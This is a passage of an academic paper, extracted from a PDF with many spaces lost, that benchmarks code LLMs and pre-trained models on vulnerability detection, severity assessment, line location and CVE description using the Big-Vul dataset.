ability assessment. It is worth noting that DeepSeek-Coder, beforeusingitasavulnerabilitydetectorisnecessary. after fine-tuning, achieves the best performance compared to other LLMs and pre-trained LMs. If researchers need to perform tasks such as vulnerability assessment with LLM, [C] The comparisons of Top-10 CWE types between fine-tuning DeepSeek-Coder is a more efficient choice. We LLMs. Table 7 shows the detailed comparisons of Top- also find that Mistral exhibits a relatively smaller improve- 10 CWE types between fine-tuned LLMs. In this table, ment after fine-tuning, which aligns with our expectations, we highlight the best performance for each performance asitisageneralLLM. metric in bold. According to the results, we can achieve the following observations: (1) In most cases, CodeLlama TABLE8:ThecomparisonbetweenLLMsandsixbaselines obtainsbetterperformancethanotherLLMsintermsofF1- onsoftwarevulnerabilityassessment(RQ2) score, Precision, and Recall. Different LLMs have certain advantages in different CWE types, complementing each Methods F1-score Recall Precision Accuracy other. (2) Considering the performance of F1-score, Preci- CodeBERT 0.753 0.730 0.788 0.828 sion,andRecall,CodeLlamaachievesthebestperformances GraphCodeBERT 0.701 0.666 0.772 0.802 on CWE-125 (“Out-of-bounds Read”), CWE-362 (“Concurrent UniXcoder 0.745 0.761 0.734 0.817 ExecutionusingSharedResourcewithImproperSynchronization PLBART 0.735 0.741 0.731 0.789 CodeT5 0.743 0.750 0.741 0.817 (’Race Condition’)”), and CWE-476 (“NULL Pointer Derefer- CodeT5+ 0.706 0.677 0.755 0.789 ence”),whichindicatesCodeLlamaisexceptionallyskilledat Fine-TuningSetting detecting and mitigating vulnerabilities related to memory DeepSeek-Coder6.7B 0.814 0.785 0.854 0.860 handlingandsynchronizationissues. CodeLlama7B 0.768 0.749 0.794 0.827 StarCoder7B 0.671 0.677 0.666 0.764 Finding-3. In general, different LLMs complementing each WizardCoder7B 0.793 0.778 0.813 0.842 Mistral 0.525 0.539 0.512 0.759 other,whileCodeLlamaobtainsbetterperformanceintermsof Phi-2 0.747 0.732 0.767 0.802 F1-score,Precision,andRecall. Few-ShotSetting DeepSeek-Coder6.7B 0.229 0.339 0.310 0.262 DeepSeek-Coder33B 0.290 0.323 0.336 0.335 4.2 RQ-2: Evaluating Vulnerability Assessment of CodeLlama7B 0.310 0.331 0.334 0.373 CodeLlama34B 0.265 0.323 0.327 0.294 LLMs StarCoder7B 0.265 0.342 0.333 0.330 StarCoder15.5B 0.285 0.315 0.329 0.326 In this RQ, we delineate two task descriptions for vulner- WizardCoder7B 0.244 0.351 0.336 0.250 ability assessment: (1) code-based and (2) code-based with WizardCoder34B 0.306 0.330 0.325 0.379 additionalkeyinformation.Wecomparetheperformanceof Mistral 0.283 0.308 0.296 0.424 Phi-2 0.269 0.359 0.355 0.282 LLMsinbothtaskdescriptionsforvulnerabilityassessment and concurrently conduct a case study to illustrate the effectivenessofincorporatingkeyimportantinformation. Finding-4.Overall,fine-tunedcode-relatedLLMsoutperform ExperimentalSetting. We instruct LLM with the following pre-trained LMs in vulnerability assessment. When resources
task descriptions (i.e., Task Description 1 and Task De- permit, fine-tuning DeepSeek-Coder 6.7B for vulnerability scription 2) to tell it to act as a vulnerability assessor. We assessment is optimal, as it outperforms the pre-trained LMs first provide LLM with the vulnerable codes to explore its acrossfourmetrics. performance (Task Description 1). Moreover, we provide LLM with some key important information, including the CVEdescription,theproject,thecommitmessageaswellas Case Study.Toillustratetheeffectivenessofkeyimpor- thefilenamewhenthevulnerablecodeexiststoinvestigate tant information, we present an instance of a vulnerability theperformancedifferences(TaskDescription2). (CWE-119) in Big-Vul that is exclusively assess by CodeL- lama,asdepictedinTable9.Thisexampleisavulnerability Task Description 1: Provide a qualitative severity rating of intheLinuxproject,categorizedunderCWE-119(Improper CVSSv2.0forthevulnerableCcodesnippet. Restriction of Operations within the Bounds of a Memory Task Description 2: Provide a qualitative severity rating of Buffer Vulnerability). In an initial assessment without criti- CVSS v2.0 for the vulnerable C code snippet (with additional calinformation,CodeLlamadidnotfullygrasptheseverity information). ofthisvulnerabilityandlabeleditas“Medium”.However, with the provision of crucial details, CodeLlama can more Results. Table 8 shows the detailed results of LLMs and accurately evaluate the risk level of this vulnerability. The six baselines on vulnerability assessment. Based on these CVE description for this vulnerability highlights multiple experimentalresults,wecanobserveasignificantimprove- buffer overflows in the net/wireless/nl80211.c file of the ment in the vulnerability assessment capability of LLMs Linux kernel prior to version 2.6.39.2. These vulnerabilities after fine-tuning. Specifically, the accuracy has increased allow local users to gain elevated privileges by leveraging from0.282to0.424,reachingarangeof0.759to0.860,while the CAP NET ADMIN capability during scan operations precision has improved from 0.296 to 0.355, now ranging with an excessively long SSID value. In this scenario, the10 TABLE9:AvulnerablecodeforCodeLlamatoassesswithdifferentprompts(RQ2) ImproperRestrictionofOperationswithintheBoundsofaMemoryBufferVulnerability(CWE-119)inLinux TaskDescription1 ProvideaqualitativeseverityratingsofCVSSv2.0forthevulnerableCcodesnippet. Input1 AnexampleofaCcodesnippetwithvulnerabilities(CVE-2011-2517). Response1 Severity:Medium TaskDescription2 Provide a qualitative severity rating of CVSS v2.0 for the vulnerable C code snippet (with additional information). Input2 Project:Linux FileName:net/wireless/nl80211.c CVE Description: Multiple buffer overflows in net/wireless/nl80211.c in the Linux kernel before 2.6.39.2 allowlocaluserstogainprivilegesbyleveragingtheCAP NET ADMINcapabilityduringscanoperations withalongSSIDvalue. Commit Message: nl80211: fix check for valid SSID size in scan operations. In both trigger scan and sched scanoperations,wewerecheckingfortheSSIDlengthbeforeassigningthevaluecorrectly.Sincethe memorywasjustkzalloc’ed,thecheckwasalwaysfailingandSSIDwithover32characterswereallowedto gothrough.ThiswascausingabufferoverflowwhencopyingtheactualSSIDtotheproperplace.Thisbug hasbeentheresince2.6.29-rc4. Response2 Severity:High Analysis ThetrueSeverityisHigh.Afterprovidingadditionalkeyinformation,CodeLlamaoutputfortheSeverity changedfromMediumtoHigh. lack of proper validation of the SSID length leads to buffer ExperimentalSetting. We select the vulnerable functions overflows, enabling attackers to exploit the vulnerability, withinformationonvulnerablelinesfromthetestingsetfor escalate privileges, and execute malicious code. The com- theevaluationandinstructLLMwiththefollowingtaskde- mit message described that this bug has existed since ver- scriptiontoexploreitsvulnerabilitylocationperformance. sion 2.6.29-rc4 of the Linux kernel. Given this information, CodeLlama reassesses the risk level of this vulnerability Task Description: Provide a vulnerability location result for as “High”. This is because it allows attackers to escalate thevulnerableCcodesnippet. privileges and execute malicious code, and it has persisted foraconsiderableperiodoftime.Itiscrucialtoaddressand For the fine-tuning setting of LLMs and pre-trained patchthisvulnerabilitypromptlybyupdatingtheoperating LMs, we treat the vulnerability location task as a binary systemorkerneltoensuresecurity. classification problem, determining whether each line of To compare the vulnerability assessment capabilities of codeisvulnerableornot.Forthefew-shotsetting,aspecific LLMs after providing key information, we have created a vulnerable function may contain one or several vulnerable performancecomparisonbarchart,asshowninFig.5.LLMs lines, and LLM may also predict one or several potential have limited capacity for assessing vulnerability severity vulnerablelines(Lines predict).WeconvertLines predictinto based solely on source code. However, when provided a binary classification format. For example, if a given vul- withkeyimportantinformation,mostLLMs(i.e.,DeepSeek- nerable function consists of five lines and contains two Coder, CodeLlama, WizardCoder, and Mistral) exhibit sig- vulnerable lines [2, 3], and the LLM predicts one potential nificantly improved vulnerability assessment capabilities,
vulnerableline[2],weconvertthistoabinaryclassification particularly in terms of the Accuracy metric. The Accuracy format as [0, 0, 1, 0, 0] for ease of computation. To better hasincreasedfromtherangeof0.26-0.42totherangeof0.27- evaluate the vulnerability location performance of LLM 0.56. StarCoder and Phi-2 are showing a declining trend, on a specific vulnerable function, we consider five widely and we believe this may be attributed to the addition of usedperformancemeasures(i.e.,Precision,Recall,F1-score, key information, resulting in an increase in the number of Accuracy,andFPR). inputtokens.TheseLLMsmaynotexcelinhandlingexces- In addition to pre-trained LMs, we also consider the sively long text sequences, and we analyze this further in following four SOTA baselines: Devign [38], Reveal [47], Section5.2.Incontrast,DeepSeek-CoderandMistralexhibit IVDetect [56], and LineVul [39]. For the graph-based ap- significant improvements, possibly due to their proficiency proaches (i.e., Devign, Reveal, and IVDetect), we use GN- inhandlinglongsequentialtext. NExplainer[78],[79]forvulnerabilitylocation.Wecompare the performance of LLMs and these baselines using Top-k Finding-5. LLMs have the capacity for assessment of vulner- Accuracy,asemployedinpreviousworks[39],[79]. ability severity based on source code, and can be improved by Results. Table 10 presents the overall performance of vul- providingmorecontextinformation. nerability location between LLMs and seven baselines. Based on this table, we can achieve the following observa- tions:(1)Fine-tuningcangreatlyenhancethevulnerability 4.3 RQ-3:EvaluatingVulnerabilityLocationofLLMs location capabilities of LLMs. For example, after fine- In this RQ, we first outline how to assess the vulnerability tuning, CodeLlama 7B’s F1-score increases from 0.082 to locationcapabilitiesofLLMs.Then,weproceedtocompare 0.504,recallincreasesfrom0.063to0.396,precisionincreases the vulnerability location abilities of LLMs across different from 0.116 to 0.691, accuracy increases from 0.882 to 0.919, settings, both at a general level and in detail, and analyze and FPR decreases from 0.043 to 0.021. (2) Code-related thereasonsbehindtheobserveddifferences. LLMs often outperform pre-trained LMs in terms of F1-11          'HHS6HHN&RGH &U RGH/ODPD 6WDU&RGHU :L]DUG&RGHU 0LVWUDO 3KL HURFV) ZR,QIR    ZL,QIR                   'HHS6HHN&RGH &U RGH/ODPD 6WDU&RGHU :L]DUG&RGHU 0LVWUDO 3KL OODFH5                    'HHS6HHN&RGH &U RGH/ODPD 6WDU&RGHU :L]DUG&RGHU 0LVWUDO 3KL QRLVLFHU3                'HHS6HHN&RGH &U RGH/ODPD 6WDU&RGHU :L]DUG&RGHU 0LVWUDO 3KL \FDUXFF$             Fig.5:TheimpactofkeyimportantinformationonLLMVulnerabilityAssessment(RQ2) TABLE10:ThecomparisonbetweenLLMsandsixbaselines in Fig. 6, where the x-axis represents k and the y-axis onsoftwarevulnerabilitylocation(RQ3) representsTop-kAccuracy(%).Forcomparison,weaverage theresultsofallLLMsandpre-trainedLMs.Wecanobserve Methods F1-score Recall Precision Accuracy FPR that the performance of these graph-based methods does CodeBERT 0.470 0.514 0.433 0.879 0.078 notshowsignificantdifferencesbutisconsiderablyweaker GraphCodeBERT 0.483 0.477 0.489 0.893 0.058 UniXcoder 0.460 0.384 0.575 0.908 0.032 thanthatofpre-trainedLMs,LLMs,andLineVul.Although PLBART 0.436 0.416 0.458 0.886 0.058 pre-trained LMs achieve the highest accuracy at k=20, the CodeT5 0.493 0.408 0.623 0.914 0.028 CodeT5+ 0.303 0.207 0.565 0.902 0.018 differencebetweenthemandLLMsisnotsubstantial. Fine-TuningSetting DeepSeek-Coder6.7B 0.437 0.332 0.640 0.912 0.021 CodeLlama7B 0.504 0.396 0.691 0.919 0.021 StarCoder7B 0.245 0.169 0.443 0.893 0.024 WizardCoder7B 0.520 0.427 0.664 0.918 0.025  Mistral 0.314 0.384 0.266 0.827 0.122 Phi-2 0.458 0.361 0.629 0.912 0.025  Few-ShotSetting DeepSeek-Coder6.7B 0.111 0.111 0.112 0.852 0.081 DeepSeek-Coder33B 0.110 0.112 0.108 0.849 0.084  CodeLlama7B 0.082 0.063 0.116 0.882 0.043 CodeLlama34B 0.115 0.090 0.158 0.884 0.044 StarCoder7B 0.088 0.066 0.134 0.887 0.039  StarCoder15.5B 0.095 0.078 0.120 0.876 0.052 WizardCoder7B 0.082 0.063 0.120 0.884 0.042 WizardCoder34B 0.096 0.072 0.145 0.887 0.039  Mistral 0.086 0.065 0.127 0.885 0.040 Phi-2 0.073 0.053 0.116 0.885 0.037   score, precision, and FPR. For example, CodeLlama 7B outperforms the pre-trained LMs, which are averaged over           sixdifferentmodels,by14.3%,31.9%,and54.3%intermsof F1-score,precision,andFPR,respectively. TheTop-kAccuracyresultsoftheinterpretersareshown  \FDUXFF$NSR7 //0V /0V 'HYLJQ ,9'HWHFW 5HYHDO /LQH9XO Fig. 6: The interpretation results for different vulnerability
locatorswithkfrom2to20(RQ3)12 TABLE11:Anexampleofgeneratingvulnerabilitydescriptionforvulnerablecode(RQ4) Describevulnerabilitycode(CWE-119,ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffer) TaskDescription ProvideaCVEdescriptionforthevulnerableCcodesnippet. SourceCode AnexampleofaCcodesnippetwithvulnerabilities.CVEID:CVE-2016-0841. ResponseFromCodeT5+ libmediainmediaserverinAndroid4.xbefore4.4.4,5.0.xbefore5.0.2,5.1.xbefore5.1.1, and6.xbefore2016-08-01hascertainincorrectdeclarations,whichallowsremoteattackers to execute arbitrary code or cause a denial of service (NULL pointer dereference or memorycorruption)viaacraftedmediafile,akainternalbug28166152. ResponseFromCodeLlama media/libmedia/MediaMetadataRetriever.cppinmediaserverinAndroid4.xbefore4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-04-01 does not validate the data size, which allows attackers to execute arbitrary code or cause a denial of service (memorycorruption)viaacraftedmediafile,akainternalbug28799341.Specifically,the constructor calls the native function createMetadataRetriever in libstagefright, and later calls the getFrameAtTime function, aka internal bug 29244311. The getFrameAtTime call triggersamemorycorruptionwarning,whichallowsanattackertoexecutearbitrarycode viaacraftedvideofile,akainternal... CVEDescription media/libmedia/mediametadataretriever.cpp in mediaserver in Android 4.x before 4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-04-01 mishandles cleared service binders,whichallowsremoteattackerstoexecutearbitrarycodeorcauseadenialofservice (memorycorruption)viaacraftedmediafile,akainternalbug26040840. Case Study. We find that LLMs under few-shot setting form a case study to provide a comprehensive assessment have limitations, and in some exceptional cases, they tend oftheirperformanceindescribingvulnerabilities. to output more vulnerable lines, even if these lines do not ExperimentalSetting.WeinstructLLMswithadesignated contain vulnerabilities. We take StarCoder as an example, task description, guiding them to perform the role of a Fig. 7 depicts a vulnerability code snippet from the Big- vulnerability descriptor. Table 11 illustrates an example of Vul dataset, with the vulnerability behavior occurring in ourapproachtoevaluatingLLMs’proficiencyinconducting lines 3 and 4. However, StarCoder tends to output more vulnerabilitydescriptions. vulnerability lines, such as “[1, 2, 3, 4, 5, 6, 7, 8, 9]”, whereasafterfine-tuning,StarCoderbecomesmorecautious Task Description:ProvideaCVEdescriptionforthevulner- and only predicts “[4]”. Note that we convert the model’s ableCcodesnippet. predictionsintoaspecificformat,i.e.,transform“[0, 0, 0, 1, 0,0,0,0,0]”to“[4]”. To evaluate the precision of the generated CVE de- scription, we adopt the widely used performance metric Task Description: ROUGE [80], which is a set of metrics and is used for Provide a vulnerability location result for the vulnerable C code snippet. evaluating automatic summarization and machine transla- StarCoder: [1, 2, 3, 4, 5, 6, 7, 8, 9] StarCoder (Fine-Tuning): [4] tion software in natural language processing. The metrics 01 standard_info_part2(standard_display *dp,..., int nImages) compareanautomaticallyproducedsummaryortranslation 02 { againstareferenceorasetofreferences(human-produced) 03 dp->pixel_size = bit_size(pp,..., png_get_bit_depth(pp, pi)); 04 dp->bit_width = png_get_image_width(pp, pi) * dp->pixel_size; summary or translation. Here, we totally consider three 05 dp->cbRow = png_get_rowbytes(pp, pi); settings:1,2,andL. 06 if (dp->cbRow != (dp->bit_width+7)/8) Results. Table 12 represents the vulnerability description 07 png_error(pp, "bad png_get_rowbytes calculation"); 08 store_ensure_image(dp->ps, pp, nImages, dp->cbRow, dp->h); capabilities of LLMs and six baselines. According to the 09 } results,wecanobtainthefollowingobservations:(1) LLMs exhibit significantly weaker performance in generating Fig. 7: An example to demonstrate the limitations of Star- vulnerability descriptions compared to pre-trained LMs. Coderinvulnerabilitylocation(RQ3) For instance, pre-trained LMs achieve an average perfor- mance of 0.600, 0.487, and 0.591 on ROUGE-1, ROUGE- 2, and ROUGE-L, respectively, whereas fine-tuned LLMs Finding-6. Few-shot setting exposes LLM’s limitations, and only achieve an average of 0.406, 0.301, and 0.400 on the fine-tuning can greatly enhance the vulnerability location samemetrics.(2)Fine-tuningcansignificantlyenhancethe capabilitiesofLLMs. performance of LLMs in vulnerability descriptions.After Finding-7. Fine-tuning code-related LLMs as vulnerability fine-tuning,thereisaseveral-foldimprovementinROUGE- locators is beneficial, as they can outperform pre-trained LMs 1,ROUGE-2,andROUGE-L.ThissuggeststhattheseLLMs intermsofF1-score,precision,andFPR. possess strong learning capabilities and can extract more
gainsfromhistoricaldata.(3)ThelowROUGE-2scoresindi- catethatPhi-2hasalimitedabilitytogenerateaccurateand 4.4 RQ-4:EvaluatingVulnerabilityDescriptionofLLMs relevant high-order n-grams (pairs of consecutive words) In this RQ, we employ the ROUGH metric to evaluate the in vulnerability descriptions, indicating potential issues in LLMs’ vulnerability description capabilities. We conduct a capturingspecificanddetailedinformation. detailed statistical analysis of LLMs’ abilities and also per- CaseStudy.Todemonstratethecapabilityofpre-trained13 TABLE12:ThecomparisonofLLMsonsoftwarevulnerabil- TABLE 13: The comparison of CodeT5+, CodeLlama, and itydescription(RQ4) CodeLlama-Trimonselectedexamples(RQ4) Methods ROUGE-1 ROUGE-2 ROUGE-L Methods ROUGE-1 ROUGE-2 ROUGE-L CodeBERT 0.511 0.376 0.501 CodeT5+ 0.730 0.644 0.722 GraphCodeBERT 0.538 0.406 0.528 CodeLlama 0.366 0.266 0.360 UniXcoder 0.658 0.558 0.650 CodeLlama-Trim 0.625 0.523 0.616 PLBART 0.447 0.313 0.437 CodeT5 0.700 0.604 0.693 CodeT5+ 0.747 0.668 0.740 Finding-8.LLMsexhibitsignificantlyweakerperformancein Fine-TuningSetting generating vulnerability descriptions compared to pre-trained DeepSeek-Coder6.7B 0.434 0.325 0.425 LMs.Therefore,fine-tuningpre-trainedLMsforvulnerability CodeLlama7B 0.392 0.292 0.387 StarCoder7B 0.420 0.321 0.416 detectionisrecommended. WizardCoder7B 0.425 0.327 0.419 Mistral 0.453 0.347 0.448 Phi-2 0.313 0.196 0.305 5 DISCUSSION Few-ShotSetting Thissectiondiscussesopenquestionsregardingtheperfor- DeepSeek-Coder6.7B 0.230 0.073 0.215 mance differences observed, the impact of input sequence DeepSeek-Coder33B 0.219 0.066 0.203 length,andpotentialthreatstothevalidityofourresults. CodeLlama7B 0.221 0.070 0.205 CodeLlama34B 0.258 0.094 0.242 StarCoder7B 0.243 0.084 0.229 5.1 AnalysisofPerformanceDifference StarCoder15.5B 0.255 0.089 0.241 WizardCoder7B 0.230 0.066 0.211 In RQ1, for LineVul, there is a huge difference between WizardCoder34B 0.276 0.111 0.261 the results obtained in this paper (i.e., 0.272 of F1-score) Mistral 0.290 0.095 0.267 and the ones reported in original work (i.e., 0.910 of F1- Phi-2 0.210 0.056 0.194 score). To ensure a fair comparison, we first check the correctness of our LineVul reproduction by re-conducting the corresponding experiments using the original dataset LMsandLLMsingeneratingvulnerabilitydescriptions,we providedbyLineVul’sofficialsourceandweobtainsimilar present an example of a vulnerability (CWE-119) described results.Then,weinspecteachstepofthedatapreprocessing by CodeT5+ and CodeLlama, as shown in Table 11. This process,asoutlinedinSection3.1.Inparticular,thisprocess examplerepresentsavulnerabilitywithintheLinuxproject, involvesthreepre-processingintotal:removingblanklines, categorized as CWE-119 (Improper Restriction of Opera- removing comments, and trimming leading and trailing tionswithintheBoundsofaMemoryBufferVulnerability). spaces from lines. We pre-process the original dataset of Itisnoteworthythatevenwhenprovidedwithonlythecode LineVul, re-train, and test the model under the same pa- ofthevulnerability,CodeT5+producestexthighlysimilarto rameter settings. The results are shown in Table 14 and we theCVEdescription(highlightedinorange),indicatingthat obtainthefollowingconclusions: pre-trained LMs are capable of comprehending the essence • Our reproduced LineVul performs closely to the original and crucial features of vulnerabilities and expressing this one. informationinnaturallanguage. • Removing blank lines and comments does not signifi- Additionally,wefindthatCodeLlama’sresponseisvery cantlyaffectLineVul’sresults. similar to the CVE description, but with many additional • Trimmingleadingandtrailingspacesfromlinescausesa details.WehypothesizethatthepoorperformanceofLLMs drasticdecreaseinLineVul’sperformance. is not due to their inability to generate appropriate vulner- Generally, for C/C++ source code, we know that re- ability descriptions, but rather because they tend to output moving leading and trailing spaces does not affect the tokens endlessly, even when they should stop. In contrast, code’s semantics. Thus, to verify whether it is general to pre-trainedLMstypicallystopattheappropriatepoints. other transformer-based models, we conduct another ex- To further analyze this, we investigate the vulnerability periment on UniXcoder (another famous and widely used description capabilities of LLMs after mitigating this issue. transformer-basedpre-trainedmodel)byadoptingthesame Using CodeLlama as an example, we randomly select 100 filtering operations. The results are presented in the right examples from the testing set and manually determine partofTable14.Table14showsthattheUniXcoder’sperfor- where the descriptions should terminate, trimming CodeL- mance closely resembled LineVul’s before the third step of lama’s output accordingly. We then calculate the ROUGE processing.However,afterpre-processing,UniXcoder’sper- metrics for the trimmed outputs and compare them with formance similarly plummeted. Thus, we believe that such
the original results and those of CodeT5+. The final results types of operation will have side impacts on transformer- are presented in Table 13, we find that after trimming, the based models since these methods pay attention to each ROUGE-1,ROUGE-2,andROUGE-LscoresforCodeLlama token,thoughthesetokenshavenosemanticmeaninginthe significantlyimproved,evennearingthoseofCodeT5+.This contextofsourcecode.Basedonthisobservation,webelieve confirms our hypothesis that LLMs actually possess strong thatthevulnerabilitydetectioneffectivenessofLineVulafter vulnerabilitydescriptioncapabilities,buttheirperformance space removal is correct and the performance results are ishinderedbythetendencytooutputexcessively. reasonable.14 TABLE14:ThereproducedresultsforLineVulandUniXcoder LineVul UniXcoder Datasets F1-score Accuracy Recall Precision F1-score Accuracy Recall Precision Originaldataset 0.90 0.95 0.86 0.95 0.86 0.98 0.82 0.90 Removeemptylines 0.85 0.98 0.79 0.93 0.85 0.98 0.82 0.88 Removecomments 0.86 0.99 0.81 0.93 0.85 0.98 0.81 0.90 Removespaces 0.40 0.94 0.37 0.45 0.26 0.95 0.16 0.68 5.2 AnalysisofInputSequenceLength In RQ2, we find that after adding key information, the performanceofStarCoderandPhi-2invulnerabilityassess- ment actually weakened. We hypothesize that these LLMs may not excel in handling excessively long text sequences. Therefore, adding key information, which results in an increase in the number of input tokens, leads to a decline in performance. In this section, we aim to analyze the performance of StarCoder and Phi-2 with respect to input sequence length to determine whether there is a perfor- mance decline as the input length increases. As shown in Fig.8,thehorizontalaxisrepresentsthetokenlengthofthe inputsequence,andtheverticalaxisrepresentstheF1-score of vulnerability assessment. We categorize the input token lengths into 0-128, 128-256, 256-512, 512-1024, and 1024+ (e.g.,aninputtokenlengthof64fallsintothe0-128range), and evaluate the vulnerability assessment performance of StarCoder and Phi-2 for each category. According to Fig. 8, weobservethatastheinputlengthincreases,theF1-scores ofbothLLMsgraduallydecrease,revealingtheirsignificant limitations in assessing long sequences of vulnerable code. Therefore,inpracticalapplicationsrequiringtheassessment oflongsequencesofvulnerablecode,wemayneedtocon- sideralternativeoptimizationstrategiesormodelchoicesto ensureaccuracyandreliability.             HURFV) users online and can obtain a good response from LLMs. Furthermore,LLMswillgenerateresponseswithsomeran- domness even given the same prompt. Therefore, we set “temperature” to 0, which will reduce the randomness at most and we try our best to collect all these results in two days to avoid the model being upgraded. The second one is about the potential mistakes in the implementation of studiedbaselines.Tominimizesuchthreats,wedirectlyuse theoriginalsourcecodesharedbycorrespondingauthors. Threats to External Validity may correspond to the gen- eralization of the studied dataset. To mitigate this threat, we adopt the most large-scale vulnerability dataset with diverse information about the vulnerabilities, which are collected from practical projects, and these vulnerabilities arerecordedintheCommonVulnerabilitiesandExposures (CVE). However, we do not consider these vulnerabilities foundrecently.Besides,wedonotadoptanotherlarge-scale vulnerabilitydatasetnamedSARDsinceitisbuiltmanually and cannot satisfy the distinct characteristics of the real world[45],[47]. Threats to Construct Validity mainly correspond to the performance metrics in our evaluations. To minimize such threats,weconsiderafewwidelyusedperformancemetrics to evaluate the performance of LLMs on different types of tasks,e.g.,Recall,Precision,andROUGE.  6WDU&RGHU 6 CONCLUSION   3KL This paper aims to comprehensively investigate the capa-    bilities of LLMs for software vulnerability tasks as well as  its impacts. To achieve that, we adopt a large-scale vulner- ability dataset (named Big-Vul) and then conduct several experimentsfocusingonfourdimensions:(1)Vulnerability Detection, (2) Vulnerability Assessment, (3) Vulnerabil- ity Location, and (4) Vulnerability Description. Overall, although LLMs show some ability in certain areas, they still need further improvement to be competent in soft- ware vulnerability-related tasks. Our research conducts a comprehensive survey of LLMs’ capabilities and provides a reference for enhancing its understanding of software vulnerabilitiesinthefuture. Fig. 8: The variation of F1-scores for vulnerability assess- mentwithrespecttoinputsequencelength ACKNOWLEDGEMENTS 5.3 ThreatstoValidity This work was supported by the National Natural Sci- Threats to Internal Validity mainly contains in two-folds. ence Foundation of China (Grant No.62202419 and No. The first one is the design of a prompt to instruct LLMs 62172214), the Ningbo Natural Science Foundation (No. to give out responses. We design our prompt according to 2022J184),andtheKeyResearchandDevelopmentProgram the practical advice [77] which has been verified by many ofZhejiangProvince(No.2021C01105).15 REFERENCES [23] A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, A. N. Gomez,Ł.Kaiser,andI.Polosukhin,“Attentionisallyouneed,”
[1] T.Brown,B.Mann,N.Ryder,M.Subbiah,J.D.Kaplan,P.Dhari- Advancesinneuralinformationprocessingsystems,vol.30,2017. wal, A. Neelakantan, P. Shyam, G. Sastry, A. Askell et al., “Lan- [24] Z. Feng, D. Guo, D. Tang, N. Duan, X. Feng, M. Gong, guagemodelsarefew-shotlearners,”Advancesinneuralinforma- L. Shou, B. Qin, T. Liu, D. Jiang et al., “Codebert: A pre-trained tionprocessingsystems,vol.33,pp.1877–1901,2020. model for programming and natural languages,” arXiv preprint [2] A. Radford, K. Narasimhan, T. Salimans, I. Sutskever et al., arXiv:2002.08155,2020. “Improvinglanguageunderstandingbygenerativepre-training,” [25] D.Guo,S.Ren,S.Lu,Z.Feng,D.Tang,S.Liu,L.Zhou,N.Duan, 2018. A. Svyatkovskiy, S. Fu et al., “Graphcodebert: Pre-training code [3] P.Liu,W.Yuan,J.Fu,Z.Jiang,H.Hayashi,andG.Neubig,“Pre- representations with data flow,” arXiv preprint arXiv:2009.08366, train, prompt, and predict: A systematic survey of prompting 2020. methods in natural language processing,” ACM Computing Sur- [26] D.Guo,S.Lu,N.Duan,Y.Wang,M.Zhou,andJ.Yin,“Unixcoder: veys,vol.55,no.9,pp.1–35,2023. Unified cross-modal pre-training for code representation,” arXiv [4] R.Tang,Y.-N.Chuang,andX.Hu,“Thescienceofdetectingllm- preprintarXiv:2203.03850,2022. generatedtexts,”arXivpreprintarXiv:2303.07205,2023. [27] W.U.Ahmad,S.Chakraborty,B.Ray,andK.-W.Chang,“Unified [5] E. Nijkamp, B. Pang, H. Hayashi, L. Tu, H. Wang, Y. Zhou, pre-training for program understanding and generation,” arXiv S. Savarese, and C. Xiong, “Codegen: An open large language preprintarXiv:2103.06333,2021. modelforcodewithmulti-turnprogramsynthesis,”arXivpreprint [28] L.Ouyang,J.Wu,X.Jiang,D.Almeida,C.Wainwright,P.Mishkin, arXiv:2203.13474,2022. C.Zhang,S.Agarwal,K.Slama,A.Rayetal.,“Traininglanguage [6] Q. Zheng, X. Xia, X. Zou, Y. Dong, S. Wang, Y. Xue, Z. Wang, modelstofollowinstructionswithhumanfeedback,”Advancesin L.Shen,A.Wang,Y.Lietal.,“Codegeex:Apre-trainedmodelfor Neural Information Processing Systems, vol. 35, pp. 27730–27744, codegenerationwithmultilingualevaluationsonhumaneval-x,” 2022. arXivpreprintarXiv:2303.17568,2023. [29] P. F. Christiano, J. Leike, T. Brown, M. Martic, S. Legg, and [7] Y.Wang,W.Wang,S.Joty,andS.C.Hoi,“Codet5:Identifier-aware D. Amodei, “Deep reinforcement learning from human prefer- unifiedpre-trainedencoder-decodermodelsforcodeunderstand- ences,” Advances in neural information processing systems, vol. 30, ingandgeneration,”arXivpreprintarXiv:2109.00859,2021. 2017. [8] Y. Wang, H. Le, A. D. Gotmare, N. D. Bui, J. Li, and S. C. Hoi, [30] D. M. Ziegler, N. Stiennon, J. Wu, T. B. Brown, A. Radford, “Codet5+:Opencodelargelanguagemodelsforcodeunderstand- D. Amodei, P. Christiano, and G. Irving, “Fine-tuning language ingandgeneration,”arXivpreprintarXiv:2305.07922,2023. modelsfromhumanpreferences,”arXivpreprintarXiv:1909.08593, [9] D.AI,“Deepseekcoder:Letthecodewriteitself,”https://github. 2019. com/deepseek-ai/DeepSeek-Coder,2023. [31] J. Schulman, F. Wolski, P. Dhariwal, A. Radford, and O. Klimov, [10] R. Li, L. B. Allal, Y. Zi, N. Muennighoff, D. Kocetkov, C. Mou, “Proximal policy optimization algorithms,” arXiv preprint M.Marone,C.Akiki,J.Li,J.Chimetal.,“Starcoder:maythesource arXiv:1707.06347,2017. bewithyou!”arXivpreprintarXiv:2305.06161,2023. [32] Y.Bang,S.Cahyawijaya,N.Lee,W.Dai,D.Su,B.Wilie,H.Love- [11] B.Rozie`re,J.Gehring,F.Gloeckle,S.Sootla,I.Gat,X.E.Tan,Y.Adi, nia, Z. Ji, T. Yu, W. Chung et al., “A multitask, multilingual, J. Liu, T. Remez, J. Rapin et al., “Code llama: Open foundation multimodalevaluationofchatgptonreasoning,hallucination,and modelsforcode,”arXivpreprintarXiv:2308.12950,2023. interactivity,”arXivpreprintarXiv:2302.04023,2023. [12] C. S. Xia, Y. Wei, and L. Zhang, “Automated program repair in [33] X. Zhou, T. Zhang, and D. Lo, “Large language model for vul- theeraoflargepre-trainedlanguagemodels,”inProceedingsofthe nerability detection: Emerging results and future directions,” in 45th International Conference on Software Engineering (ICSE 2023). Proceedings of the 2024 ACM/IEEE 44th International Conference on AssociationforComputingMachinery,2023. SoftwareEngineering:NewIdeasandEmergingResults,2024,pp.47– [13] C. S. Xia and L. Zhang, “Keep the conversation going: Fixing 51. 162outof337bugsfor$0.42eachusingchatgpt,”arXivpreprint
